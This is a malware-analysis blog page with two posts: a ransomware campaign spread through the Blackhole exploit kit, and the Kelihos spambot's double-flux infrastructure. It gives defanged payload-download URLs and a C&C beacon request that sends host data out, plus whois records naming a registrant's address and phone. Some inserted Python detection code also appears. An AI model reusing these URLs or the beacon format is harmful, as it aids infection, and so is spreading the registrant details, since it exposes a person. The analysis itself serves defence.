Archive for the 'Malware & Virus Analysing' Category

Ransomware Gets Professional, Targeting Switzerland, Germany And Austria

In March I blogged about a ransomware which has been targeting various countries, locking down the victim's computer due to “Child Porn and Terrorism”.

This week I spotted another ransomware campaign that is targeting Swiss, German, and Austrian internet users. This time the criminals seem to use a different scheme to lock down the victim's computer: violation of local copyright law.

*** Infection vector ***
The infection vector is a well-known drive-by exploit kit called “Blackhole”. It is sold in underground forums and used by various criminal groups to infect computers “on the fly” by (ab)using one or more security vulnerabilities in the victim's web browser (or a third-party plug-in like Adobe Flash Player, Adobe Reader or Java). In this case a Blackhole exploit kit located at pampa04.com was involved in spreading the ransomware:

hXXp://pampa04.com/main.php?page=d73d9795c56f8f33 [landing page]
 -> hXXp://pampa04.com/data/ap2.php [JavaScript loading exploits]
  -> hXXp://pampa04.com/Edu.jar [Java exploit]
   -> hXXp://pampa04.com/w.php?f=5e91c&e=0 [Payload]

If the installed Java version on the victim's computer is not up to date (unpatched), the downloaded jar file (Edu.jar) will exploit a well-known vulnerability in Java which triggers the download of the payload (Trojan) and finally executes it to infect the computer. The payload had a detection rate of 4/42 on VirusTotal:

Filename: info.exe
MD5: 56f4d5837af32b12069576fae8c2b3c5
File size: 312.5 KB
AV-detection rate: 4/42

*** Analysis of the payload (Ransomware) ***
If the exploitation of the victim's computer is successful, the Ransomware will install itself into the Application Data directory of the current user:

C:\Documents and Settings\Christoph\Application Data\itunes_service01.exe

Once the computer has been infected, the Ransomware will try to contact its Command&Control server (C&C) located at joonwalker.com using HTTP GET:

hXXp://joonwalker.com/unser1/redirector/redirector.php
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php
hXXp://joonwalker.com/ajax/libs/jquery/1.3.2/jquery.min.js
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/bg_ch.gif
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/js/keyboard.js

The landing URL redirector.php will determine the location of the infected computer by using GeoIP and will redirect the request to the matching site by using HTTP 302 Found, for example:

hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php

While investigating this C&C I've found several other URLs which show that this Ransomware is targeting not only Switzerland but also several other countries:

hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/ (Switzerland)
hXXp://joonwalker.com/unser1/universalbezahlung/deutschland/ (Germany)
hXXp://joonwalker.com/unser1/universalbezahlung/oesterreich/ (Austria)
hXXp://joonwalker.com/unser1/universalbezahlung/england/ (England)
hXXp://joonwalker.com/unser1/universalbezahlung/frankreich/ (France)
hXXp://joonwalker.com/unser1/universalbezahlung/holland/ (Netherlands)

[Screenshots of the country-specific lock screens; captions: Switzerland (SUISA), Germany (GVU), Austria (AKM), United Kingdom (PRS), France (SACEM), Netherlands (BUMA-STEMRA)]

What stands out quickly when taking a look at these URLs is the fact that they are all written in German. So it looks like the cybercriminal behind this ransomware campaign is a German-speaking person. While analysing all these different URLs I noticed that the cybercriminal has spent quite some time preparing them. The language seems to be well written (I couldn't find as many spelling errors as I would have expected). In addition it appears that the cybercriminal tried to get intel about where the victim can buy paysafecard (for the record: the victim has to pay a country-specific amount of money to the cybercriminal using paysafecard to get his computer unlocked) and which association is tracking copyright infringement in the specific country. For example, he tells Swiss victims that they can obtain paysafecard at the federal railway station (SBB) and at MediaMark (a German-based electronics discounter).

Another interesting finding is the fact that the Ransomware comes with an additional Trojan called Aldi Bot. Aldi Bot steals banking information (similar to ZeuS and SpyEye) and has some additional DDoS functionality.

Fortunately, Aldi Bot C&C traffic is very easy to identify due to the fact that this Trojan uses a specific User-Agent called “Aldi Bot FTW! :D ”. In this case the Aldi Bot C&C is located at the same server/domain as the Ransomware itself but on a different URI:

GET /unser1/universalpanel/gate.php?hwid=XXX&pc=XXX&localip=XXX&winver=XXX HTTP/1.1
User-Agent: Aldi Bot FTW! :D
Host: joonwalker.com

*** Command&Control Infrastructure ***

The domain name used by this Ransomware and Aldi Bot is pointing to a Russian web hosting provider called “Amtel Svyaz”:

$ dig +short joonwalker.com
195.208.185.99

$ whois 195.208.185.99
inetnum: 195.208.184.0 – 195.208.187.255
netname: AMTEL-SVYAZ
descr: “Amtel Svyaz” ZAO
country: RU
org: ORG-AZ2-RIPE
admin-c: AG12682-RIPE
tech-c: AG12682-RIPE
tech-c: AG8732-RIPE
status: ASSIGNED PA
mnt-by: ROSNIIROS-MNT
mnt-domains: AMTELSV-MNT
mnt-routes: ROSNIIROS-MNT
source: RIPE # Filtered
[...]

The domain name joonwalker.com is registered through a Russian-based domain registrar called Regtime Ltd (also known as webnames.ru):

Domain name: joonwalker.com

Name servers:
ns1.nameself.com
ns2.nameself.com

Registrar: Regtime Ltd.
Creation date: 2012-04-29
Expiration date: 2013-04-29

Registrant:
Huth Matthias
Email: huthmatthias@yahoo.de
Organization: Huth Matthias
Address: Bremenstrasse 12
City: Gladbeck
State: NRW
ZIP: 45964
Country: DE
Phone: +49.3051236167
Fax: +49.3051236169

According to whois the holder of this domain is “Huth Matthias”, who has registered various other domain names this year:


All these domain names can be considered malicious and should be blocked at your network edge.
To prevent this kind of infection you should ensure that your operating system as well as all installed applications (especially browser plug-ins) are up to date.

Kelihos Back In Town Using Fast Flux

In September 2011, Microsoft announced the takedown of the Kelihos botnet. In the beginning of 2012, Kaspersky found a new version of Kelihos in the wild.

Kelihos (also known as Hlux) is a spambot with the capability to steal credentials from the victim's computer and drop additional malware. While the old version used the second-level domain cz.cc for its distribution and to control the botnet, the new version takes advantage of the TLD .eu in combination with Fast Flux techniques.

*** The Kelihos Spambot ***

Recently, I spotted a sample of Kelihos in my sandnet, so I decided to have a short look at it:

As soon as the victim's computer has been infected successfully, the malware will try to drop an additional file by calling a .eu domain which seems to be hard-coded in the infection binary:

hXXp://ejywqem.eu/rtce003.exe
hXXp://etrodhy.eu/jucheck.exe

The first URL will return a binary:

Filename: rtce003.exe
MD5 hash: 1393e4f5d0691e3de07eeda1b1451b89
File size: 886’272 bytes
AV detection: 10 / 43

The mentioned file will install the WinPcap library, which is used by the malware to sniff the network traffic on the victim's computer:

Origin process (executing process)   Affected file
C:\WINDOWS\Temp\_ex-68.exe           C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\Temp\_ex-68.exe           C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\Temp\_ex-68.exe           C:\WINDOWS\system32\drivers\npf.sys

By sniffing the network traffic, the malware is able to steal sensitive data like credentials.
The second URL (jucheck.exe) will just return an HTTP 200 OK. As soon as the WinPcap library has been installed, the malware will start to communicate with other drones on port 80 (using its own protocol). It is some kind of P2P protocol used by the malware to get a list of other drones participating in the Kelihos botnet.

To begin its spam operations, Kelihos will connect to another drone using HTTP and a random URL string:

GET /FCgbKbGODaYkpTghnsw.htm HTTP/1.1
Host: 79.132.177.87
Content-Length: 1464
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre

*encrypted-data*

HTTP/1.1 200
Server: Apache
Content-Length: 55002
Content-Type:
Last-Modified: X
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 04 Mar 2012 X
Last-Modified:Sun, 04 Mar 2012 X
Accept-Ranges:bytes

*encrypted-data*

This communication is used to get the spam templates as well as the email address list. Afterwards the spambot will start to send out spam mails.

Currently the Kelihos botnet seems to send out German stock spam.

*** Kelihos FastFlux botnet ***

Let's take a closer look at the .eu domains used by Kelihos. What pops up quickly is the fact that the domain names used by Kelihos are hosted on a FastFlux botnet, as all the records have a TTL of 0:

$ dig ejywqem.eu A

;; QUESTION SECTION:
;ejywqem.eu. IN A

;; ANSWER SECTION:
ejywqem.eu. 0 IN A 88.132.1.15

The delegated nameservers for the mentioned domain name are hosted on a FastFlux botnet as well. This is what we call Double-Flux:

$ dig ejywqem.eu NS

;; QUESTION SECTION:
;ejywqem.eu. IN NS

;; ANSWER SECTION:
ejywqem.eu. 0 IN NS ns6.ejywqem.eu.
ejywqem.eu. 0 IN NS ns1.ejywqem.eu.
ejywqem.eu. 0 IN NS ns2.ejywqem.eu.
ejywqem.eu. 0 IN NS ns3.ejywqem.eu.
ejywqem.eu. 0 IN NS ns4.ejywqem.eu.
ejywqem.eu. 0 IN NS ns5.ejywqem.eu.
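As an added example (not code from the original post), the TTL-0 and in-bailiwick checks behind the single-flux versus double-flux distinction above, run over constructed dig output that mirrors the ejywqem.eu records; the example.com and example.net records are constructed control cases.

```python
import re

# Constructed dig output modelled on the records quoted in the write-up (ejywqem.eu);
# the "stable NS" and "normal" samples use documentation names/addresses as controls.
DIG_A = """;; QUESTION SECTION:
;ejywqem.eu.            IN  A

;; ANSWER SECTION:
ejywqem.eu.     0   IN  A   88.132.1.15
"""
DIG_NS = """;; ANSWER SECTION:
ejywqem.eu.     0   IN  NS  ns6.ejywqem.eu.
ejywqem.eu.     0   IN  NS  ns1.ejywqem.eu.
"""
DIG_NS_STABLE = """;; ANSWER SECTION:
ejywqem.eu.     86400   IN  NS  ns1.example.net.
"""
DIG_NORMAL = """;; ANSWER SECTION:
example.com.    3600    IN  A   192.0.2.1
"""

RR = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(A|NS)\s+(\S+)$")

def parse_answers(dig_output):
    """Return (owner, ttl, type, rdata) tuples from the ANSWER SECTION of dig output."""
    records, in_answer = [], False
    for line in dig_output.splitlines():
        if line.startswith(";; ANSWER SECTION"):
            in_answer = True
            continue
        if line.startswith(";;"):  # any other section header ends the answer section
            in_answer = False
        m = RR.match(line.strip()) if in_answer else None
        if m:
            owner, ttl, rtype, rdata = m.groups()
            records.append((owner.rstrip(".").lower(), int(ttl), rtype, rdata.rstrip(".").lower()))
    return records

def flux_assessment(a_output, ns_output, max_ttl=0):
    """'normal', 'single-flux' (A records at TTL <= max_ttl) or 'double-flux' (the NS
    records are also at TTL <= max_ttl and live inside the domain itself, as for ejywqem.eu)."""
    a_recs = [r for r in parse_answers(a_output) if r[2] == "A"]
    ns_recs = [r for r in parse_answers(ns_output) if r[2] == "NS"]
    if not a_recs or any(r[1] > max_ttl for r in a_recs):
        return "normal"
    # In-bailiwick: the nameserver name ends with "." + the domain it serves.
    if ns_recs and all(r[1] <= max_ttl and r[3].endswith("." + r[0]) for r in ns_recs):
        return "double-flux"
    return "single-flux"
```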

When taking a look at the geolocation of this Fast Flux botnet, it seems that the botnet is mainly located in eastern Europe.

Due to the fact that these domain names are using double-flux, it is extremely hard to shut them down (there is no webserver or DNS server to take down). Currently, there are several domain names hosted on this Fast Flux botnet:


All mentioned domain names are registered through OnlineNIC (a domain name registrar located in the US):

Domain: zoneczu

Registrant:
NOT DISCLOSED!
Visit www.eurid.eu for webbased whois.

Registrar Technical Contacts:
Name: Breeze Wu
Organisation: OnlineNIC Inc.
Language: en
Phone: +86.15306099988
Fax: +852.58044444
Email: Tech@regionalofficecenter.com

Registrar:
Name: OnlineNIC Inc
Website: www.onlinenic.com

Name servers:
ns5.pizzebu.com
ns6.pizzebu.com

The domain name used to resolve these malicious domains is registered through internet.bs (a domain name registrar located in the Bahamas):

Domain Name: PIZZEBU.COM
Registrar: INTERNET.BS CORP.
Whois Server: whois.internet.bs
Referral URL: http://www.internet.bs
Name Server: NS1.PIZZEBU.COM
Name Server: NS2.PIZZEBU.COM
Name Server: NS3.PIZZEBU.COM
Name Server: NS4.PIZZEBU.COM
Name Server: NS5.PIZZEBU.COM
Name Server: NS6.PIZZEBU.COM
Status: clientTransferProhibited
Updated Date: 13-jan-2012
Creation Date: 13-jan-2012
Expiration Date: 13-jan-2013

This Fast Flux botnet reminds me of the Fast Flux botnet used by Waledac which was also using a TTL of 0 for their DNS records.

*** Detection ***

As hard as it is to take down this botnet, it should be just as easy to detect computers infected with Kelihos. The malware itself seems to ignore several RFCs, which makes it very easy to detect infected computers in corporate and governmental networks.

In the first stage, the malware hits “jucheck.exe” with an incomplete HTTP request:

GET /jucheck.exe HTTP/1.0
Host: etrodhy.eu

This particular HTTP request is missing several HTTP header fields which a normal web browser would send:

  • Several HTTP header fields like User-Agent, Accept-Language and Accept-Encoding are missing
  • The URL jucheck.exe seems to be quite static, so you just have to watch out for .eu domains in combination with jucheck.exe in your gateway logs

In the second stage (where the malware tries to connect to other drones using HTTP), the malware sends 1-2KB of encrypted data to the foreign peer:

GET /FCgbKbGODaYkpTghnsw.htm HTTP/1.1
Host: 79.132.177.87
Content-Length: 1464

I'm not an RFC specialist, but I've never seen an HTTP GET request in combination with the Content-Length header. I would only expect the HTTP Content-Length header in the server's response or in an HTTP POST request to the server. Therefore it should be very easy to detect Kelihos in your network: just watch out for HTTP GET requests carrying the header field “Content-Length”.
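As an added example (not code from the original post), the detection heuristics above (the jucheck.exe request without browser headers and the GET carrying Content-Length) together with the hard-coded Aldi Bot User-Agent from the ransomware post earlier on this page, applied to constructed sample request heads modelled on the requests quoted on the page:

```python
# Constructed sample requests (not captured traffic), modelled on the requests quoted on this page.
SAMPLE_REQUESTS = [
    "GET /jucheck.exe HTTP/1.0\r\nHost: etrodhy.eu\r\n\r\n",
    "GET /FCgbKbGODaYkpTghnsw.htm HTTP/1.1\r\nHost: 79.132.177.87\r\n"
    "Content-Length: 1464\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\n\r\n",
    "GET /unser1/universalpanel/gate.php?hwid=XXX HTTP/1.1\r\n"
    "User-Agent: Aldi Bot FTW! :D\r\nHost: joonwalker.com\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n"
    "Accept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n",
]

BROWSER_HEADERS = ("user-agent", "accept-language", "accept-encoding")

def parse_request(raw):
    """Split a raw request head into (method, path, {lowercased header name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def classify(raw):
    """Return the list of rules from the write-up that this request trips ([] = clean)."""
    method, path, headers = parse_request(raw)
    host = headers.get("host", "").lower()
    hits = []
    # Kelihos peer traffic: a GET request that carries a Content-Length header.
    if method == "GET" and "content-length" in headers:
        hits.append("kelihos-p2p: GET with Content-Length")
    # Kelihos stage 1: the static jucheck.exe path requested from a .eu domain.
    if method == "GET" and path.endswith("/jucheck.exe") and host.endswith(".eu"):
        hits.append("kelihos-stage1: jucheck.exe on .eu host")
    # Not a browser: none of the usual browser headers are present at all.
    if not any(h in headers for h in BROWSER_HEADERS):
        hits.append("non-browser: no User-Agent/Accept-Language/Accept-Encoding")
    # Aldi Bot: the hard-coded User-Agent string seen in its gate.php C&C requests.
    if headers.get("user-agent", "").startswith("Aldi Bot FTW!"):
        hits.append("aldibot-c2: hard-coded User-Agent")
    return hits

def scan(requests):
    """Return (path, hits) for every request that trips at least one rule."""
    flagged = []
    for raw in requests:
        hits = classify(raw)
        if hits:
            flagged.append((parse_request(raw)[1], hits))
    return flagged
```

The same rules map directly onto proxy log fields (method, host, path, presence of a request header), which is where you would run them in practice.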

Happy Kelihos hunting!

Follow me on Twitter:
https://twitter.com/abuse_ch